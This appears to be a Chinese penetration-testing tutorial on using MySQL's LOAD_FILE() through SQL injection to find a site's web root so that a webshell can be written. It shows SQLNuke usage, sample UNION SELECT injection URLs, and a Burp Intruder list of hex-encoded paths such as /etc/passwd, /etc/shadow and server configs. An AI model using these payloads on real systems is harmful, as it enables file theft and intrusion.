MySQL注入Load_File()函数应用
Posted 潇湘信安
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MySQL注入Load_File()函数应用相关的知识,希望对你有一定的参考价值。
所有话题标签:
|
0x01 前言
相信很多人在渗透测试过程中都有遇到过这种情况:一个mysql Root高权限注入点,也具备读取和写入权限,这时只需要找到网站绝对路径就可以写入Webshell了,但如果利用所有已知方法还是找不到网站绝对路径呢?这节我将给大家介绍一款注入辅助工具和BurpSuite利用方式。
0x02 SQLNuke工具介绍
https://github.com/nuke99/sqlnuke
sql.rb //主程序
config.yml //配置文件
lib/ //基础库目录
output/ //输出目录
inputs/packset.lst //字典文件
class/methods.rb //类文件
root@Jacks:~/sqlnuke-master# ./sql.rb -h
-u, --url URL Link with 'XxxX' ex: http://tar.com/?id=1+UNION+SELECT+1,XxxX,2--
-d, --data DATA POST DATA ex: id=-1+Union+Select+null,XxxX,null--&name=John
-x, --hex Hex Conversion
--proxy http://IP:PORT HTTP Proxy
--os (linux,win) Target Server OS (linux,win)
--agent AGENT User-Agent for the header
--ref REFERER Referer for the header
--cookie COOKIE Cookie for the header
-h, --help Information about commands
0x03 利用BurpSuite测试
http://wiki.apache.org/httpd/DistrosDefaultLayout
-
BurpSuite-> Intruder -> Payloads->Payload Processing->Add->Encode(Encode as ASCII hex)
0x2F6574632F706173737764
0x2F6574632F736861646F77
0x2F6574632F67726F7570
0x2F6574632F686F737473
0x2F6574632F617061636865322F6C6F67732F6163636573732E6C6F67
0x2F6574632F68747470642F6163636573732E6C6F67
0x2F6574632F696E69742E642F6170616368652F68747470642E636F6E66
0x2F6574632F696E69742E642F617061636865322F68747470642E636F6E66
0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66
0x2F7573722F6C6F63616C2F6170616368652F636F6E662F68747470642E636F6E66
0x2F686F6D652F6170616368652F68747470642E636F6E66
0x2F686F6D652F6170616368652F636F6E662F68747470642E636F6E66
0x2F6F70742F6170616368652F636F6E662F68747470642E636F6E66
0x2F6574632F68747470642F68747470642E636F6E66
0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
0x2F6574632F6170616368652F6170616368652E636F6E66
0x2F6574632F6170616368652F68747470642E636F6E66
0x2F6574632F617061636865322F617061636865322E636F6E66
0x2F6574632F617061636865322F68747470642E636F6E66
0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66
0x433A5C626F6F742E696E69
0x433a5c77616d705c62696e5c6170616368655c6c6f67735c6163636573732e6c6f67
0x433a5c77616d705c62696e5c6d7973716c5c6d7973716c352e352e32345c77616d707365727665722e636f6e66
0x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c68747470642e636f6e66
0x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c77616d707365727665722e636f6e66
0x433a5c70687053747564795c4170616368655c636f6e665c68747470642e636f6e66
0x433a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c
以上是关于MySQL注入Load_File()函数应用的主要内容,如果未能解决你的问题,请参考以下文章
Mysql注入中的outfiledumpfileload_file函数详解